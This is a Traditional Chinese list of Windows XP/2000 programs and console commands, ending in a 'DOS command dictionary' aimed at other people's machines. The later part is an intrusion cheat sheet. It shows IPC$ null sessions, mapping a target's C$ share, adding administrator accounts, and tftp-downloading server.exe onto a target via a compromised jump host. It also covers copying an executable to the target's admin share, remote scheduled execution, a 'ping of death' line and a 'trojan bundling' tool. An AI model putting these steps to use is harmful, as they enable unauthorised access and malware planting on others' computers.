chgusr.exe 改變用戶（終端服務） (XP不可用)
chkdsk.exe 磁碟檢測程序
chkntfs.exe NTFS磁碟檢測程序
cidaemon.exe 組成Ci文檔服務
cipher.exe 在NTFS上顯示或改變加密的文件或目錄
cisvc.exe 打開索引內容
ckcnv.exe 變換Cookie
cleanmgr.exe 磁碟清理
cliconfg.exe SQL客戶網路工具
clipbrd.exe 剪貼簿查看器
clipsrv.exe 運行Clipboard服務
clspack.exe 建立系統文件列表清單
cluster.exe 顯示域的集群 (XP不可用)
cmd.exe 進2000\XP DOS
cmdl32.exe 自動下載連接管理
cmmgr32.exe 連接管理器
cmmon32.exe 連接管理器監視
cmstp.exe 連接管理器配置文件安裝程序
comclust.exe 集群
comp.exe 比較兩個文件和文件集的內容
conf 啟動netmeeting聊天工具
control userpasswords2 XP密碼管理.
compmgmt.msc 計算機管理
cprofile.exe 轉換顯示模式 (XP不可用)
開始,運行,輸入CMD\輸入net config workstation計算機名 \完整的計算機名\用戶名
工作站處於活動狀態（即網路描述） \軟體版本（即軟體版本號） \工作站域 工作站域的 DNS 名稱
登錄域 \COM 打開時間超時（秒） \COM 發送量（位元組） \COM 發送超時 (msec)
CMD\輸入net config workstation 更改可配置工作站服務設置。
CMD\輸入net config server 可以顯示不能配置的下伺服器計算機名 \伺服器注釋 \伺服器版本（即軟體版本號）
伺服器處於活動狀態（即網路描述） \伺服器處於隱藏狀態（即 /hidden 設置）
最大登錄用戶數（即可使用伺服器共享資源的最大用戶數）
每個會話打開文件的最大數（即用戶可在一個會話中打開伺服器文件的最大數）
空閑會話時間（最小值）
chkdsk.exe 磁碟檢查.
Chkdsk /r 2000命令控制台中的Chkdsk /r命令檢查修復系統文件
cleanmgr 垃圾整理
Clipbrd 剪貼板查看器
C:boot.ini 打開啟動菜單
compact.exe 顯示或改變NTFS分區上文件的壓縮狀態
conime.exe IME控制台
control.exe 控制面板
convert.exe NTFS 轉換文件系統到NTFS
convlog.exe 轉換IIS日誌文件格式到NCSA格式
cprofile.exe 轉換顯示模式
cscript.exe 較本宿主版本
csrss.exe 客戶伺服器Runtime進程 (XP不可用)
csvde.exe 格式轉換程序 (XP不可用)
dcpromo 活動目錄安裝(XP不可用)
drwtsn32 系統醫生
diskmgmt.msc 磁碟管理器(和PowerQuest PartitionMagic 8.0)
dvdplay DVD 播放器
devmgmt.msc 設備管理器(檢查電腦硬體,驅動)
dxdiag 檢查DirectX信息
dcomcnfg.exe DCOM配置屬性 (控制台根目錄)
dcpromo.exe 安裝向導 (XP不可用)
ddeshare.exe DDE共享
debug.exe 檢查DEBUG
dfrgfat.exe FAT分區磁碟碎片整理程序
dfrgntfs.exe NTFS分區磁碟碎片整理程序 (XP不可用)
dfs_cmd_.exe 配置DFS樹 (XP不可用)
dfsinit.exe 分布式文件系統初始化(XP不可用)
dfssvc.exe 分布式文件系統伺服器 (XP不可用)
diantz.exe 製作CAB文件
diskperf.exe 磁碟性能計數器
dmremote.exe 磁碟管理服務的一部分 (XP不可用)
doskey.exe 命令行創建宏
dosx.exe DOS擴展
dplaysvr.exe 直接運行幫助 (XP不可用)
drwatson.exe 華生醫生錯誤檢測
drwtsn32.exe 華生醫生顯示和配置管理
dvdplay.exe DVD播放
dxdiag.exe Direct-X診斷工具
edlin.exe 命令行的文本編輯
esentutl.exe MS資料庫工具
eudcedit.exe 造字程序
eventvwr.exe 事件查看器
exe2bin.exe 轉換EXE文件到二進制
expand.exe 解壓縮
extrac32.exe 解CAB工具
fsmgmt.msc 共享文件夾
fastopen.exe 快速訪問在內存中的硬碟文件
faxcover.exe 傳真封面編輯
faxqueue.exe 顯示傳真隊列
faxsend.exe 發送傳真向導
faxsvc.exe 啟動傳真服務
fc.exe 比較兩個文件的不同
find.exe 查找文件中的文本行
findstr.exe 查找文件中的行
finger.exe 一個用戶並顯示出統計結果
fixmapi.exe 修復MAPI文件
flattemp.exe 允許或者禁用臨時文件目錄 (XP不可用)
fontview.exe 顯示字體文件中的字體
forcedos.exe 強制文件在DOS模式下運行
ftp.exe FTP下載
gpedit.msc 組策略
gdi.exe 圖形界面驅動
grpconv.exe 轉換程序管理員組
hostname.exe 顯示機器的Hostname
Internat 輸入法圖標
iexpress 木馬捆綁工具，系統自帶
ieshwiz.exe 自定義文件夾向導
iexpress.exe iexpress安裝包
iisreset.exe 重啟IIS服務(未安裝IIS,不可用)
internat.exe 鍵盤語言指示器 (XP不可用)
ipconfig.exe 查看IP配置
ipsecmon.exe IP安全監視器
ipxroute.exe IPX路由和源路由控製程序
irftp.exe 無線連接
ismserv.exe 安裝或者刪除Service Control Manager中的服務
jdbgmgr.exe Java4的調試器
jetconv.exe 轉換Jet Engine資料庫 (XP不可用)
jetpack.exe 壓縮Jet資料庫 (XP不可用)
jview.exe Java的命令行裝載者
label.exe 改變驅動器的卷標
lcwiz.exe 許可證向導 (XP不可用)
ldifde.exe LDIF目錄交換命令行管理 (XP不可用)
licmgr.exe 終端服務許可協議管理 (XP不可用)
lights.exe 顯示連接狀況 (XP不可用)
llsmgr.exe Windows 2000 許可協議管理 (XP不可用)
llssrv.exe 啟動許可協議伺服器 (XP不可用)
locator.exe RPC Locator 遠程定位
lodctr.exe 調用性能計數
logoff.exe 注銷當前用戶
lpq.exe 顯示遠端的LPD列印隊列的狀態，顯示被送到基於Unix的伺服器的列印任務
lpr.exe 用於Unix客戶列印機將列印任務發送給連接了列印設備的NT的列印機伺服器。
lsass.exe 運行LSA和Server的DLL
lserver.exe 指定默認Server新的DNS域 (XP不可用)
lusrmgr.msc 本地賬戶管理
mmc 控制台
mplayer2 播放器
macfile.exe 管理MACFILES (XP不可用)
magnify.exe 放大鏡
makecab.exe 製作CAB文件
mem.exe 顯示內存狀態
migpwd.exe 遷移密碼
mmc.exe 控制台
mnmsrvc.exe 遠程桌面共享
mobsync.exe 同步目錄管理器
mountvol.exe 創建、刪除或列出卷的裝入點。
mplay32.exe Media Player 媒體播放器
mpnotify.exe 通知應用程序
mqbkup.exe 信息隊列備份和恢復工具
mqmig.exe MSMQ Migration Utility 信息隊列遷移工具
mrinfo.exe 使用SNMP多點傳送路由
mscdexnt.exe 安裝MSCD
msdtc.exe 動態事務處理控制台
msg.exe 發送消息到本地或遠程客戶
mshta.exe HTML應用程序主機
msiexec.exe 開始Windows安裝程序
mspaint.exe 打開畫圖板
mstask.exe 任務計劃表程序
mstinit.exe 任務計劃表安裝
Msconfig.exe 系統配置實用程序 (配置啟動選項,服務項)
mem.exe 顯示內存使用情況
mspaint 畫圖板
Net Stop Messenger 停止信使服務
Net Start Messenger 恢復信使服務
nslookup 網路管理的工具
Nslookup IP 地址偵測器
ntbackup 系統備份和還原
nbtstat.exe 使用 NBT（TCP/IP 上的 NetBIOS）顯示協議統計和當前 TCP/IP 連接。
nddeapir.exe NDDE API伺服器端
netsh.exe 用於配置和監控 Windows 2000 命令行腳本介面(XP不可用)
netstat.exe 顯示協議統計和當前的 TCP/IP 網路連接。
nlsfunc.exe 載入特定國家的信息。Windows 2000 和 MS-DOS 子系統不使用該命令接受該命令只是為了與 MS-DOS 文件兼容。
notepad.exe 打開記事本
nslookup.exe 該診斷工具顯示來自域名系統 (DNS) 名稱伺服器的信息。
ntbackup.exe 備份和故障修復工具
ntfrs.exe NT文件復制服務 (XP不可用)
ntvdm.exe 模擬16位Windows環境
nw16.exe NetWare轉向器
nwscript.exe 運行Netware腳本
odbcad32.exe 32位ODBC數據源管理 (驅動程序管理)
odbcconf.exe 命令行配置ODBC驅動和數據源
packager.exe 對象包裝程序
pathping.exe 包含Ping和Tracert的程序
pentnt.exe 檢查Pentium的浮點錯誤
perfmon.exe 系統性能監視器
ping.exe 驗證與遠程計算機的連接
posix.exe 用於兼容Unix
print.exe 列印文本文件或顯示列印隊列的內容。
progman.exe 程序管理器
psxss.exe Posix子系統應用程序
qappsrv.exe 在網路上顯示終端伺服器可用的程序
qprocess.exe 在本地或遠程顯示進程的信息（需終端服務）
query.exe 查詢進程和對話 (XP不可用)
quser.exe 顯示用戶登陸的信息（需終端服務）
qwinsta.exe 顯示終端服務的信息
rononce -p 15秒關機
rasAdmin 遠程訪問服務.
regedit.exe 注冊表編輯器
rasadmin.exe 啟動遠程訪問服務 (XP不可用)
rasautou.exe 建立一個RAS連接
rasdial.exe 寬頻,撥號連接
ras.exe 運行RAS連接 (XP不可用)
rcp.exe 計算機和運行遠程外殼埠監控程序 rshd 的系統之間復制文件
rdpclip.exe 終端和本地復制和粘貼文件
recover.exe 從壞的或有缺陷的磁碟中恢復可讀取的信息。
redir.exe 運行重定向服務
regedt32.exe 32位注冊服務
regini.exe 用腳本修改注冊許可
regwiz.exe 注冊向導
replace.exe 用源目錄中的同名文件替換目標目錄中的文件。
rexec.exe rexec 命令在執行指定命令前，驗證遠程計算機上的用戶名，只有安裝了 TCP/IP 協議後才可以使用該命令。
risetup.exe 運行遠程安裝向導服務 (XP不可用)
route.exe 控制網路路由表
rsh.exe 在運行 RSH 服務的遠程計算機上運行命令
rsnotify.exe 遠程存儲通知回顯
runas.exe 允許用戶用其他許可權運行指定的工具和程序
rundll32.exe 啟動32位DLL程序
rwinsta.exe 重置會話子系統硬體和軟體到最初的值
Sndvol32 音量控製程序
sfc.exe 或CMD\ sfc.exe 回車 系統文件檢查器
services.msc 網路連接服務
syskey 系統加密，(一旦加密就不能解開，保護windows xp系統的雙重密碼wupdmgr WIDNOWS UPDATE)
SCANREG/RESTORE 命令恢復最近的注冊表
secedit.exe 自動化安全性配置管理
services.exe 控制所有服務
sethc.exe 設置高對比
setver.exe 設置 MS-DOS 子系統向程序報告的 MS-DOS 版本號
sfc.exe 系統文件檢查
shadow.exe 監控另外一台中端伺服器會話
shrpubw.exe 建立和共享文件夾
sigverif.exe 文件簽名驗證
smlogsvc.exe 性能日誌和警報 (XP不可用)
sndrec32.exe 錄音機
sndvol32.exe 顯示聲音控制信息
snmp.exe 簡單網路管理協議 (XP不可用)
snmptrap.exe SNMP工具 (XP不可用)
srvmgr.exe 伺服器管理器 (XP不可用)
subst.exe 將路徑與驅動器盤符關聯
sysedit.exe 系統配置編輯器
syskey.exe NT賬號資料庫加密工具
sysocmgr.exe > Windows 安裝程序
systray.exe 在低許可權運行systray
taskmgr 任務管理器
tasklist /svc(CMD)了解每個SVCHOST進程到底提供了多少系統服務(2000\98不可用)
tlist -S(CMD) 了解每個SVCHOST進程到底提供了多少系統服務(
taskman.exe 任務管理器 (XP不可用)
taskmgr.exe 任務管理器
tcmsetup.exe 電話服務客戶安裝
tcpsvcs.exe TCP服務
termsrv.exe 終端服務
tftp.exe 將文件傳輸到正在運行 TFTP 服務的遠程計算機或從正在運行 TFTP 服務的遠程計算機傳輸文件
themes.exe 桌面主題 (XP不可用)
tlntadmn.exe Administrator Telnet服務管理
tlntsess.exe 顯示目前的Telnet會話
tlntsvr.exe 開始Telnet服務
tracert.exe 診斷實用程序將包含不同生存時間 (TTL) 值的 Internet 控制消息協議 (ICMP) 回顯數據包發送到目標，以決定到達目標採用的
啟動項。並可設置是否故障啟動。
開始,運行,輸入Regedit 注冊表修改工具注冊表編輯器，如果沒有把握不要隨意修改注冊表！
開始,運行,輸入Regsvr32 dll注冊工具當提示找不到dll文件時，可用此來注冊該動態連接庫。
開始,運行,輸入Regwiz 注冊向導用於注冊。校驗系統文件，並可恢復系統文件。
如果啟動時出現類似*.vxd文件錯誤，可用此恢復該vxd文件。
開始,運行,輸入Scandskw 磁碟掃描程序,用於掃描修復磁碟。如果磁碟或文件出現錯誤，可用來初步修復。
開始,運行,輸入DxDiag DirectX診斷工具可用於檢測DirectX運行是否正常。
開始,運行,輸入NETSCAPE
ESC：清除當前命令行；
F7：顯示命令歷史記錄，以圖形列表窗的形式給出所有曾經輸入的命令，並可用上下箭頭鍵選擇再次執行該命令。
F8：搜索命令的歷史記錄，循環顯示所有曾經輸入的命令，直到按下回車鍵為止；
F9：按編號選擇命令，以圖形對話框方式要求您輸入命令所對應的編號(從0開始)，並將該命令顯示在屏幕上；
Ctrl+H：刪除游標左邊的一個字元；
Ctrl+C Ctrl+Break，強行中止命令執行；
Ctrl+M：表示回車確認鍵；
Alt+F7：清除所有曾經輸入的命令歷史記錄；
Alt+PrintScreen：截取屏幕上當前命令窗里的內容。
病毒破壞了系統文件，請使用殺毒軟體查殺病毒，然後利用Windows 2000提供的「命令控制台」中的Chkdsk /r命令檢查修復系統文件即可
DOS命令字典..收藏
net use \ip\ipc$ " " /user:" " 建立IPC空鏈接
net use \ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: \ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: \ip\c$ 登陸後映射對方C：到本地為H:
net use \ip\ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup ***istrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意：***istrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務；(如:net start telnet， net start schele)
net stop 服務名 停止某服務
net time \目標ip 查看對方時間
net time \目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view \ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc
net share ipc$ /del 刪除ipc
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況，常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示
刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件，「DEL/A-S *.*」表示刪除當前目錄下除
系統文件以外的所有文件
#2 二：
del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪
除。（二個命令作用相同）
move 盤符\路徑\要移動的文件名存放移動文件的路徑\移動後文件名移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠遠和登陸伺服器,默認埠為23
open ip 連接到IP（屬telnet登陸後的命令）
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑\文件名1 路徑\文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe \ip\***$ 復制本地c:\srv.exe到對方的***下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：2st.txt文件頭要空三排，參數：/b指二進
制文件，/a指ASCLL格式文件
\ip\***$\svv.exe c:\ 或:\ip\***$\*.* 復制對方***i.exe文件（所有文件）至本地C：
x 要復制的文件或目錄樹 目標地址\目錄名復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe 登陸後，將「IP」的server.exe下載到目標主機c:\server.exe
參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送
tftp -i 對方IP put c:\server.exe 登陸後，上傳本地c:\server.exe至主機
ftp ip 埠用於上傳文件至伺服器或進行文件操作，默認埠為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本
文件時)
route print 顯示出IP路由，將主要顯示網路地址Network addres，子網掩碼Netmask，網關地址Gateway addres，介面地址Interface
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件（目錄）的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統，隱藏屬性；用＋則是添加為某屬性
dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間，而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元設置環境變數
set 顯示當前所有的環境變數
set p(或其它字?